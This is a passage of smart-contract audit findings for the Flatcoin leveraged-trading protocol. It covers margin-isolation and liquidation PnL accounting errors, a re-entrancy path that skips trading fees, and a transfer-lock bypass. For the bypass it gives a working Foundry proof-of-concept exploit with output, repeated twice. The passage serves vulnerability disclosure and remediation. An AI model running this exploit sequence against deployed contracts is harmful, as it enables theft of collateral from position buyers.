as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n\\n // Profit loss of leverage traders has to be accounted for by adjusting the stable collateral total.\\n // Note that technically, even the funding fees should be accounted for when computing the stable collateral total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here\\n _updateStableCollateralTotal(-profitLossTotal);\\n }\\n```\\n
The following are the two issues identified earlier and the recommended fixes:\\nIssue 1\\nLet's review Alice's Long Position 1: Her position's settled margin is -1 ETH. When the settled margin is -ve then the LPs have to bear the cost of loss per the comment here. However, in this case, we can see that it is Bob (a long trader) instead of the LPs who is bearing the cost of Alice's loss, which is incorrect.\\nFix: Alice's -1 ETH loss should be borne by the LPs, not the long traders. The stable collateral total of the LPs should be reduced by 1 ETH to bear the cost of the loss.\\nIssue 2\\nLet's review Bob's Long Position 2: His position's settled margin is 1 ETH. If his position's liquidation margin is $LM$, Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin. However, in this case, the `marginDepositedTotal` is already zero, so there is no more collateral left in the long trader pool for Bob to withdraw, which is incorrect.\\nFix: Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin regardless of the PnL of other long traders. Bob's margin should be isolated from Alice's loss (see the sketch below).
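One possible way to realize the second fix, sketched purely as an assumption rather than the protocol's design: cap each position's contribution to the aggregated loss at its own deposited margin, and charge any excess (bad debt) to the LPs' stable collateral instead of the shared `marginDepositedTotal`.\\n```\\n// Illustrative aggregation only -- `_openPositions` and the helper names are hypothetical.\\nint256 profitLossTotal;\\nint256 badDebt;\\nfor (uint256 i; i < _openPositions.length; ++i) {\\n FlatcoinStructs.Position memory position = _openPositions[i];\\n int256 pnl = PerpMath._profitLoss(position, currentPrice);\\n int256 floor = -int256(position.marginDeposited);\\n if (pnl < floor) {\\n badDebt += floor - pnl; // the portion this trader's margin cannot cover\\n pnl = floor; // other traders' margin is not reduced by it\\n }\\n profitLossTotal += pnl;\\n}\\n// `badDebt` would then be deducted from `stableCollateralTotal`, not from the other longs' margin.\\n```\\n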
Loss of assets for the long traders as the losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits.
```\\npriceShift = current price - last price\\npriceShift = $600 - $1000 = -$400\\n\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / current price\\nprofitLossTotal = (12 ETH * -$400) / $600\\nprofitLossTotal = -8 ETH\\n```\\n
The transfer lock for leveraged position orders can be bypassed
high
Leveraged positions can be closed either through `DelayedOrder` or through `LimitOrder`. Once an order is announced via the `DelayedOrder.announceLeverageClose` or `LimitOrder.announceLimitOrder` function, the LeverageModule's `lock` function is called to prevent the given token from being transferred. This mechanism can be bypassed, and it is possible to unlock the token transfer while an order is still announced.\\nExploitation scenario:\\nAttacker announces leverage close order for his position via `announceLeverageClose` of `DelayedOrder` contract.\\nAttacker announces limit order via `announceLimitOrder` of `LimitOrder` contract.\\nAttacker cancels limit order via `cancelLimitOrder` of `LimitOrder` contract.\\nThe position gets unlocked while the leverage close announcement is still active.\\nAttacker sells the leveraged position to a third party.\\nAttacker executes the leverage close via `executeOrder` of `DelayedOrder` contract and gets the underlying collateral, stealing the funds from the third party that the leveraged position was sold to.\\nThe following proof of concept presents the attack:\\n```\\nfunction testExploitTransferOut() public {\\n uint256 collateralPrice = 1000e8;\\n\\n vm.startPrank(alice);\\n\\n uint256 balance = WETH.balanceOf(alice);\\n console2.log("alice balance", balance);\\n \\n (uint256 minFillPrice, ) = oracleModProxy.getPrice();\\n\\n // Announce order through delayed orders to lock tokenId\\n delayedOrderProxy.announceLeverageClose(\\n tokenId,\\n minFillPrice - 100, // add some slippage\\n mockKeeperFee.getKeeperFee()\\n );\\n \\n // Announce limit order to lock tokenId\\n limitOrderProxy.announceLimitOrder({\\n tokenId: tokenId,\\n priceLowerThreshold: 900e18,\\n priceUpperThreshold: 1100e18\\n });\\n \\n // Cancel limit order to unlock tokenId\\n limitOrderProxy.cancelLimitOrder(tokenId);\\n \\n balance = WETH.balanceOf(alice);\\n console2.log("alice after creating two orders", balance);\\n\\n // TokenId is unlocked and can be transferred while the delayed order is active\\n leverageModProxy.transferFrom(alice, address(0x1), tokenId);\\n console2.log("new owner of position NFT", leverageModProxy.ownerOf(tokenId));\\n\\n balance = WETH.balanceOf(alice);\\n console2.log("alice after transfering position NFT out e.g. selling", balance);\\n\\n skip(uint256(vaultProxy.minExecutabilityAge())); // must reach minimum executability time\\n\\n uint256 oraclePrice = collateralPrice;\\n\\n bytes[] memory priceUpdateData = getPriceUpdateData(oraclePrice);\\n delayedOrderProxy.executeOrder{value: 1}(alice, priceUpdateData);\\n\\n uint256 finalBalance = WETH.balanceOf(alice);\\n console2.log("alice after executing delayerd order and cashing out profit", finalBalance);\\n console2.log("profit", finalBalance - balance);\\n}\\n```\\n\\nOutput\\n```\\nRunning 1 test for test/unit/Common/LimitOrder.t.sol:LimitOrderTest\\n[PASS] testExploitTransferOut() (gas: 743262)\\nLogs:\\n alice balance 99879997000000000000000\\n alice after creating two orders 99879997000000000000000\\n new owner of position NFT 0x0000000000000000000000000000000000000001\\n alice after transfering position NFT out e.g. selling 99879997000000000000000\\n alice after executing delayerd order and cashing out profit 99889997000000000000000\\n profit 10000000000000000000\\n\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 50.06ms\\n\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n
It is recommended to prevent announcing an order through either `DelayedOrder.announceLeverageClose` or `LimitOrder.announceLimitOrder` if the leveraged position is already locked.
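A sketch of that guard in `LimitOrder::announceLimitOrder()`, assuming the leverage module exposes an `isLocked(tokenId)` view (the exact function and error names are illustrative):\\n```\\nfunction announceLimitOrder(uint256 tokenId, uint256 priceLowerThreshold, uint256 priceUpperThreshold) external {\\n ILeverageModule leverageModule = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY));\\n\\n // Reject the announcement if the position is already locked by a pending close order, so cancelling\\n // one announcement can no longer unlock a token that another active order still depends on.\\n if (leverageModule.isLocked(tokenId)) revert FlatcoinErrors.OrderAlreadyExists(tokenId); // illustrative error\\n\\n // ... existing announcement logic, followed by leverageModule.lock(tokenId) ...\\n}\\n```\\nThe symmetric check would be added to `DelayedOrder.announceLeverageClose` as well.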
The attacker can sell the leveraged position with a close order opened, execute the order afterward, and steal the underlying collateral.
```\\nfunction testExploitTransferOut() public {\\n uint256 collateralPrice = 1000e8;\\n\\n vm.startPrank(alice);\\n\\n uint256 balance = WETH.balanceOf(alice);\\n console2.log("alice balance", balance);\\n \\n (uint256 minFillPrice, ) = oracleModProxy.getPrice();\\n\\n // Announce order through delayed orders to lock tokenId\\n delayedOrderProxy.announceLeverageClose(\\n tokenId,\\n minFillPrice - 100, // add some slippage\\n mockKeeperFee.getKeeperFee()\\n );\\n \\n // Announce limit order to lock tokenId\\n limitOrderProxy.announceLimitOrder({\\n tokenId: tokenId,\\n priceLowerThreshold: 900e18,\\n priceUpperThreshold: 1100e18\\n });\\n \\n // Cancel limit order to unlock tokenId\\n limitOrderProxy.cancelLimitOrder(tokenId);\\n \\n balance = WETH.balanceOf(alice);\\n console2.log("alice after creating two orders", balance);\\n\\n // TokenId is unlocked and can be transferred while the delayed order is active\\n leverageModProxy.transferFrom(alice, address(0x1), tokenId);\\n console2.log("new owner of position NFT", leverageModProxy.ownerOf(tokenId));\\n\\n balance = WETH.balanceOf(alice);\\n console2.log("alice after transfering position NFT out e.g. selling", balance);\\n\\n skip(uint256(vaultProxy.minExecutabilityAge())); // must reach minimum executability time\\n\\n uint256 oraclePrice = collateralPrice;\\n\\n bytes[] memory priceUpdateData = getPriceUpdateData(oraclePrice);\\n delayedOrderProxy.executeOrder{value: 1}(alice, priceUpdateData);\\n\\n uint256 finalBalance = WETH.balanceOf(alice);\\n console2.log("alice after executing delayerd order and cashing out profit", finalBalance);\\n console2.log("profit", finalBalance - balance);\\n}\\n```\\n
A malicious user can bypass limit order trading fees via cross-function re-entrancy
high
A malicious user can bypass limit order trading fees via cross-function re-entrancy, since `_safeMint` makes an external call to the user before updating state.\\nIn the `LeverageModule` contract, the `_mint` function calls `_safeMint`, which makes an external call `to` the receiver of the NFT (the `to` address).\\n\\nOnly after this external call, `vault.setPosition()` is called to create the new position in the vault's storage mapping. This means that an attacker can gain control of the execution while the state of `_positions[_tokenId]` in FlatcoinVault is not up-to-date.\\n\\nThis outdated state of `_positions[_tokenId]` can be exploited by an attacker once the external call has been made. They can re-enter `LimitOrder::announceLimitOrder()` and provide the tokenId that has just been minted. In that function, the trading fee is calculated as follows:\\n```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n```\\n\\nHowever, since the position has not been created yet (due to state being updated after an external call), this results in the `tradeFee` being 0 since `vault.getPosition(tokenId).additionalSize` returns the default value of a uint256 (0), and `tradeFee` = fee * size.\\nHence, when the limit order is executed, the trading fee (tradeFee) charged to the user will be `0`.\\nA user announces opening a leverage position, calling announceLeverageOpen() via a smart contract which implements `IERC721Receiver`.\\nOnce the keeper executes the order, the contract is called via the function `onERC721Received(address,address,uint256,bytes)`.\\nThe function calls `LimitOrder::announceLimitOrder()` to create the desired limit order to close the position (stop loss, take profit levels).\\nThe contract then returns `msg.sig` (the function signature of the executing function) to satisfy the IERC721Receiver's requirement.\\nTo run this proof of concept:\\nAdd 2 files `AttackerContract.sol` and `ReentrancyPoC.t.sol` to `flatcoin-v1/test/unit` in the project's repo.\\nRun `forge test --mt test_tradingFeeBypass -vv` in the terminal.\\n
To fix this specific issue, the following change is sufficient:\\n```\\n// Remove the line below\\n_newTokenId = _mint(_account); \\n\\nvault.setPosition( \\n FlatcoinStructs.Position({\\n lastPrice: entryPrice,\\n marginDeposited: announcedOpen.margin,\\n additionalSize: announcedOpen.additionalSize,\\n entryCumulativeFunding: vault.cumulativeFundingRate()\\n }),\\n// Remove the line below\\n _newTokenId\\n// Add the line below\\n tokenIdNext\\n);\\n// Add the line below\\n_newTokenId = _mint(_account); \\n```\\n\\nHowever, there are still more state changes that would occur after the `_mint` function (potentially yielding other cross-function re-entrancy if the other contracts were changed), so the safest solution would be to mint the NFT only after all state changes have been executed, i.e., move `_mint` all the way to the end of `LeverageModule::executeOpen()`.\\nOtherwise, if changing this order of operations is undesirable for whatever reason, one can implement the following check within `LimitOrder::announceLimitOrder()` to ensure that the `positions[_tokenId]` is not uninitialized:\\n```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n\\n// Add the line below\\nrequire(additionalSize > 0, "Additional Size of a position cannot be zero");\\n```\\n
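For reference, a simplified sketch of the reordered flow at the end of `LeverageModule::executeOpen()` (variable names follow the diff above; surrounding logic omitted):\\n```\\n// Effects first: record the position under the pre-computed token id so any callback\\n// triggered later reads fully initialized state.\\nvault.setPosition(\\n FlatcoinStructs.Position({\\n lastPrice: entryPrice,\\n marginDeposited: announcedOpen.margin,\\n additionalSize: announcedOpen.additionalSize,\\n entryCumulativeFunding: vault.cumulativeFundingRate()\\n }),\\n tokenIdNext\\n);\\n\\n// Interaction last: `_safeMint`'s `onERC721Received` callback now runs only after all\\n// state it could read has been written (checks-effects-interactions).\\n_newTokenId = _mint(_account);\\n```\\n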
A malicious user can bypass the trading fees for a limit order, via cross-function re-entrancy. These trading fees were supposed to be paid to the LPs by increasing `stableCollateralTotal`, but due to limit orders being able to bypass trading fees (albeit during the same transaction as opening the position), LPs are now less incentivised to provide their liquidity to the protocol.
```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n```\\n
Incorrect handling of PnL during liquidation
high
The incorrect handling of PnL during liquidation led to an error in the protocol's accounting mechanism, which might result in various issues, such as the loss of assets and the stable collateral total being inflated.\\nFirst Example\\nAssume a long position with the following state:\\nMargin Deposited = +20\\nAccrued Funding = -100\\nProfit & Loss (PnL) = +100\\nLiquidation Margin = 30\\nLiquidation Fee = 25\\nSettled Margin = Margin Deposited + Accrued Funding + PnL = 20\\nLet the current `StableCollateralTotal` be $x$ and `marginDepositedTotal` be $y$ at the start of the liquidation.\\nFirstly, the `settleFundingFees()` function will be executed at the start of the liquidation process. The effect of the `settleFundingFees()` function is shown below. The long trader's `marginDepositedTotal` will be reduced by 100, while the LP's `stableCollateralTotal` will increase by 100.\\n```\\nsettleFundingFees() = Short/LP need to pay Long 100\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = y + (-100) = (y - 100)\\n\\nstableCollateralTotal = x + (-(-100)) = (x + 100)\\n```\\n\\nSince the position's settle margin is below the liquidation margin, the position will be liquidated.\\nAt Line 109, the condition `(settledMargin > 0)` will be evaluated as `True`. At Line 123:\\n```\\nif (uint256(settledMargin) > expectedLiquidationFee)\\nif (+20 > +25) => False\\nliquidatorFee = settledMargin\\nliquidatorFee = +20\\n```\\n\\nThe `liquidationFee` will be to +20 at Line 127 below. This basically means that all the remaining margin of 20 will be given to the liquidator, and there should be no remaining margin for the LPs.\\nAt Line 133 below, the `vault.updateStableCollateralTotal` function will be executed:\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(0 - (+100));\\nvault.updateStableCollateralTotal(-100);\\n\\nstableCollateralTotal = (x + 100) - 100 = x\\n```\\n\\nWhen `vault.updateStableCollateralTotal` is set to `-100`, `stableCollateralTotal` is equal to $x$.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n..SNIP..\\n // Check that the total margin deposited by the long traders is not -ve.\\n // To get this amount, we will have to account for the PnL and funding fees accrued.\\n int256 settledMargin = positionSummary.marginAfterSettlement;\\n\\n uint256 liquidatorFee;\\n\\n // If the settled margin is greater than 0, send a portion (or all) of the margin to the liquidator and LPs.\\n if (settledMargin > 0) {\\n // Calculate the liquidation fees to be sent to the caller.\\n uint256 expectedLiquidationFee = PerpMath._liquidationFee(\\n position.additionalSize,\\n liquidationFeeRatio,\\n liquidationFeeLowerBound,\\n liquidationFeeUpperBound,\\n currentPrice\\n );\\n\\n uint256 remainingMargin;\\n\\n // Calculate the remaining margin after accounting for liquidation fees.\\n // If the settled margin is less than the liquidation fee, then the liquidator fee is the settled margin.\\n if (uint256(settledMargin) > expectedLiquidationFee) {\\n liquidatorFee = expectedLiquidationFee;\\n remainingMargin = uint256(settledMargin) - expectedLiquidationFee;\\n } else {\\n liquidatorFee = uint256(settledMargin);\\n }\\n\\n // Adjust the stable collateral total to account for user's remaining margin.\\n // If the remaining margin is greater than 0, this goes to the LPs.\\n // Note that 
{`remainingMargin` - `profitLoss`} is the same as {`marginDeposited` + `accruedFunding`}.\\n vault.updateStableCollateralTotal(int256(remainingMargin) - positionSummary.profitLoss);\\n\\n // Send the liquidator fee to the caller of the function.\\n // If the liquidation fee is greater than the remaining margin, then send the remaining margin.\\n vault.sendCollateral(msg.sender, liquidatorFee);\\n } else {\\n // If the settled margin is -ve then the LPs have to bear the cost.\\n // Adjust the stable collateral total to account for user's profit/loss and the negative margin.\\n // Note: We are adding `settledMargin` and `profitLoss` instead of subtracting because of their sign (which will be -ve).\\n vault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\n }\\n```\\n\\nNext, the `vault.updateGlobalPositionData` function here will be executed.\\n```\\nvault.updateGlobalPositionData({marginDelta: -(position.marginDeposited + positionSummary.accruedFunding)})\\nvault.updateGlobalPositionData({marginDelta: -(20 + (-100))})\\nvault.updateGlobalPositionData({marginDelta: 80})\\n\\nprofitLossTotal = 100\\nnewMarginDepositedTotal = globalPositions.marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = (y - 100) + 80 + 100 = (y + 80)\\n\\nstableCollateralTotal = stableCollateralTotal + -PnL\\nstableCollateralTotal = x + (-100) = (x - 100)\\n```\\n\\nThe final `newMarginDepositedTotal` is $y + 80$ and `stableCollateralTotal` is $x -100$, which is incorrect. In this scenario\\nThere is no remaining margin for the LPs, as all the remaining margin has been sent to the liquidator as a fee. The remaining margin (settled margin) is also not negative. Thus, there should not be any loss on the `stableCollateralTotal`. The correct final `stableCollateralTotal` should be $x$.\\nThe final `newMarginDepositedTotal` is $y + 80$, which is incorrect as this indicates that the long trader's pool has gained 80 ETH, which should not be the case when a long position is being liquidated.\\nSecond Example\\nThe current price of rETH is $1000.\\nLet's say there is a user A (Alice) who makes a deposit of 5 rETH as collateral for LP.\\nLet's say another user, Bob (B), comes up, deposits 2 rETH as a margin, and creates a position with a size of 5 rETH, basically creating a perfectly hedged market. Since this is a perfectly hedged market, the accrued funding fee will be zero for the context of this example.\\nTotal collateral in the system = 5 rETH + 2 rETH = 7 rETH\\nAfter some time, the price of rETH drop to $500. 
As a result, Bob's position is liquidated as its settled margin is less than zero.\\n$$ settleMargin = 2\\ rETH + \\frac{5 \\times (500 - 1000)}{500} = 2\\ rETH - 5\\ rETH = -3\\ rETH $$\\nDuring the liquidation, the following code is executed to update the LP's stable collateral total:\\n```\\nvault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(-3 rETH - (-5 rETH));\\nvault.updateStableCollateralTotal(+2);\\n```\\n\\nLP's stable collateral total increased by 2 rETH.\\nSubsequently, the `updateGlobalPositionData` function will be executed.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n\\nWithin the `updateGlobalPositionData` function, the `profitLossTotal` at Line 179 will be -5 rETH. This means that the long trader (Bob) has lost 5 rETH.\\nAt Line 205 below, the PnL of the long traders (-5 rETH) will be transferred to the LP's stable collateral total. In this case, the LPs gain 5 rETH.\\nNote that the LP's stable collateral total has been increased by 2 rETH earlier and now we are increasing it by 5 rETH again. Thus, the total gain by LPs is 7 rETH. If we add 7 rETH to the original stable collateral total, it will be 7 rETH + 5 rETH = 12 rETH. However, this is incorrect because we only have 7 rETH collateral within the system, as shown at the start.\\n```\\nFile: FlatcoinVault.sol\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n\\n // Profit loss of leverage traders has to be accounted for by adjusting the stable collateral total.\\n // Note that technically, even the funding fees should be accounted for when computing the stable collateral total.\\n // However, since the funding fees are settled at the 
same time as the global position data is updated,\\n // we can ignore the funding fees here\\n _updateStableCollateralTotal(-profitLossTotal);\\n }\\n```\\n\\nThird Example\\nAt $T0$, the marginDepositedTotal = 70 ETH, stableCollateralTotal = 100 ETH, vault's balance = 170 ETH\\nBob's Long Position: Margin = 70 ETH, Position Size = 500 ETH, Leverage = (500 + 70) / 70 ≈ 8x, Liquidation Fee = 50 ETH, Liquidation Margin = 60 ETH, Entry Price = $1000 per ETH\\nAlice (LP): Deposited = 100 ETH\\nAt $T1$, the position's settled margin falls to 60 ETH (margin = +70, accrued fee = -5, PnL = -5) and is subject to liquidation.\\nFirstly, the `settleFundingFees()` function will be executed at the start of the liquidation process. The effect of the `settleFundingFees()` function is shown below. The long trader's `marginDepositedTotal` will be reduced by 5, while the LP's `stableCollateralTotal` will increase by 5.\\n```\\nsettleFundingFees() = Long need to pay short 5\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = 70 + (-5) = 65\\n\\nstableCollateralTotal = 100 + (-(-5)) = 105\\n```\\n\\nNext, this part of the code will be executed to send a portion of the liquidated position's margin to the liquidator and LPs.\\n```\\nsettledMargin > 0 => True\\n(settledMargin > expectedLiquidationFee) => (+60 > +50) => True\\nremainingMargin = uint256(settledMargin) - expectedLiquidationFee = 60 - 50 = 10\\n```\\n\\n50 ETH will be sent to the liquidator and the remaining 10 ETH should go to the LPs.\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss) =>\\nstableCollateralTotal = 105 ETH + (remaining margin - PnL)\\nstableCollateralTotal = 105 ETH + (10 ETH - (-5 ETH))\\nstableCollateralTotal = 105 ETH + (15 ETH) = 120 ETH\\n```\\n\\nNext, the `vault.updateGlobalPositionData` function here will be executed.\\n```\\nvault.updateGlobalPositionData({marginDelta: -(position.marginDeposited + positionSummary.accruedFunding)})\\nvault.updateGlobalPositionData({marginDelta: -(70 + (-5))})\\nvault.updateGlobalPositionData({marginDelta: -65})\\n\\nprofitLossTotal = -5\\nnewMarginDepositedTotal = globalPositions.marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 70 + (-65) + (-5) = 0\\n\\nstableCollateralTotal = stableCollateralTotal + -PnL\\nstableCollateralTotal = 120 + (-(-5)) = 125\\n```\\n\\nThe reason why profitLossTotal = -5 is that there is only one (1) position in the system. So, this loss actually comes from the loss of Bob's position.\\nThe `newMarginDepositedTotal = 0` is correct. This is because the system only has 1 position, which is Bob's position; once the position is liquidated, there should be no margin deposited left in the system.\\nHowever, `stableCollateralTotal = 125` is incorrect, because the vault's collateral balance is now 170 - 50 (sent to liquidator) = 120. Thus, the tracked balance and actual collateral balance are not in sync.
To remediate the issue, the `profitLossTotal` should be excluded within the `updateGlobalPositionData` function during liquidation.\\n```\\n// Remove the line below\\n profitLossTotal = PerpMath._profitLossTotal(// rest of code)\\n\\n// Remove the line below\\n newMarginDepositedTotal = globalPositions.marginDepositedTotal // Add the line below\\n _marginDelta // Add the line below\\n profitLossTotal\\n// Add the line below\\n newMarginDepositedTotal = globalPositions.marginDepositedTotal // Add the line below\\n _marginDelta\\n\\nif (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n}\\n\\n_globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) // Add the line below\\n _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n});\\n \\n// Remove the line below\\n _updateStableCollateralTotal(// Remove the line below\\nprofitLossTotal);\\n```\\n\\nThe existing `updateGlobalPositionData` function still needs to be used for other functions besides liquidation. As such, consider creating a separate new function (e.g., updateGlobalPositionDataDuringLiquidation) solely for use during the liquidation that includes the above fixes.\\nThe following attempts to apply the above fix to the three (3) examples described in the report to verify that it is working as intended.\\nFirst Example\\nLet the current `StableCollateralTotal` be $x$ and `marginDepositedTotal` be $y$ at the start of the liquidation.\\nDuring funding settlement:\\nStableCollateralTotal = $x$ + 100\\nmarginDepositedTotal = $y$ - 100\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(int256(remainingMargin) - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(0 - (+100));\\nvault.updateStableCollateralTotal(-100);\\n```\\n\\nStableCollateralTotal = ($x$ + 100) - 100 = $x$\\nDuring Global Position Update:\\nmarginDelta = -(position.marginDeposited + positionSummary.accruedFunding) = -(20 + (-100)) = 80\\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta = ($y$ - 100) + 80 = ($y$ - 20)\\nNo change to StableCollateralTotal here. Remain at $x$\\nConclusion:\\nThe LPs should not gain or lose in this scenario. Thus, the fact that the StableCollateralTotal remains as $x$ before and after the liquidation is correct.\\nThe `marginDepositedTotal` is ($y$ - 20) is correct because the liquidated position's remaining margin is 20 ETH. Thus, when this position is liquidated, 20 ETH should be deducted from the `marginDepositedTotal`\\nNo revert during the execution.\\nSecond Example\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(-3 rETH - (-5 rETH));\\nvault.updateStableCollateralTotal(+2);\\n```\\n\\nStableCollateralTotal = 5 + 2 = 7 ETH\\nDuring Global Position Update:\\nmarginDelta = -(position.marginDeposited + positionSummary.accruedFunding) = -(2 + 0) = -2\\nmarginDepositedTotal = marginDepositedTotal + marginDelta = 2 + (-2) = 0\\nConclusion:\\nStableCollateralTotal = 7 ETH, marginDepositedTotal = 0 (Total 7 ETH tracked in the system)\\nBalance of collateral in the system = 7 ETH. Thus, both values are in sync. 
No revert.\\nThird Example\\nDuring funding settlement (Transfer 5 from Long to LP):\\nmarginDepositedTotal = 70 + (-5) = 65\\nStableCollateralTotal = 100 + 5 = 105\\nTransfer fee to Liquidator\\n50 ETH sent to the liquidator from the system: Balance of collateral in the system = 170 ETH - 50 ETH = 120 ETH\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss) =>\\nstableCollateralTotal = 105 ETH + (remaining margin - PnL)\\nstableCollateralTotal = 105 ETH + (10 ETH - (-5 ETH))\\nstableCollateralTotal = 105 ETH + (15 ETH) = 120 ETH\\n```\\n\\nStableCollateralTotal = 120 ETH\\nDuring Global Position Update:\\nmarginDelta= -(position.marginDeposited + positionSummary.accruedFunding) = -(70 + (-5)) = -65\\nmarginDepositedTotal = 65 + (-65) = 0\\nConclusion:\\nStableCollateralTotal = 120 ETH, marginDepositedTotal = 0 (Total 120 ETH tracked in the system)\\nBalance of collateral in the system = 120 ETH. Thus, both values are in sync. No revert.
The following is a list of potential impacts of this issue:\\nFirst Example: LPs incur unnecessary losses during liquidation, which would be avoidable if the calculations were correctly implemented from the start.\\nSecond Example: An error in the protocol's accounting mechanism led to an inflated increase in the LPs' stable collateral total, which in turn inflated the number of tokens users can withdraw from the system.\\nThird Example: The accounting error led to the tracked balance and actual collateral balance not being in sync.
```\\nsettleFundingFees() = Short/LP need to pay Long 100\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = y + (-100) = (y - 100)\\n\\nstableCollateralTotal = x + (-(-100)) = (x + 100)\\n```\\n
Asymmetry in profit and loss (PnL) calculations
high
An asymmetry arises in profit and loss (PnL) calculations due to relative price changes. This discrepancy emerges when adjustments to a position lead to differing PnL outcomes despite equivalent absolute price shifts in rETH, leading to a loss of assets.\\nScenario 1\\nAssume at $T0$, the price of rETH is $1000. Bob opened a long position with the following state:\\nPosition Size = 40 ETH\\nMargin = $x$ ETH\\nAt $T2$, the price of rETH increased to $2000. Thus, Bob's PnL is as follows: he gains 20 rETH.\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $1000) / $2000\\nPnL = $40000 / $2000 = 20 rETH\\n```\\n\\nImportant Note: In terms of dollars, each ETH earns $1000. Since the position held 40 ETH, the position gained $40000.\\nScenario 2\\nAssume at $T0$, the price of rETH is $1000. Bob opened a long position with the following state:\\nPosition Size = 40 ETH\\nMargin = $x$ ETH\\nAt $T1$, the price of rETH dropped to $500. An adjustment is executed against Bob's long position, and a `newMargin` is computed to account for the PnL accrued till now, as shown in Line 191 below. Thus, Bob's PnL is as follows: he lost 40 rETH.\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($500 - $1000) / $500\\nPnL = -$20000 / $500 = -40 rETH\\n```\\n\\nAt this point, the position's `marginDeposited` will be $(x - 40)\\ rETH$ and `lastPrice` set to $500.\\nImportant Note 1: In terms of dollars, each ETH lost $500. Since the position held 40 ETH, the position lost $20000.\\n```\\nFile: LeverageModule.sol\\n // This accounts for the profit loss and funding fees accrued till now.\\n uint256 newMargin = (marginAdjustment +\\n PerpMath\\n 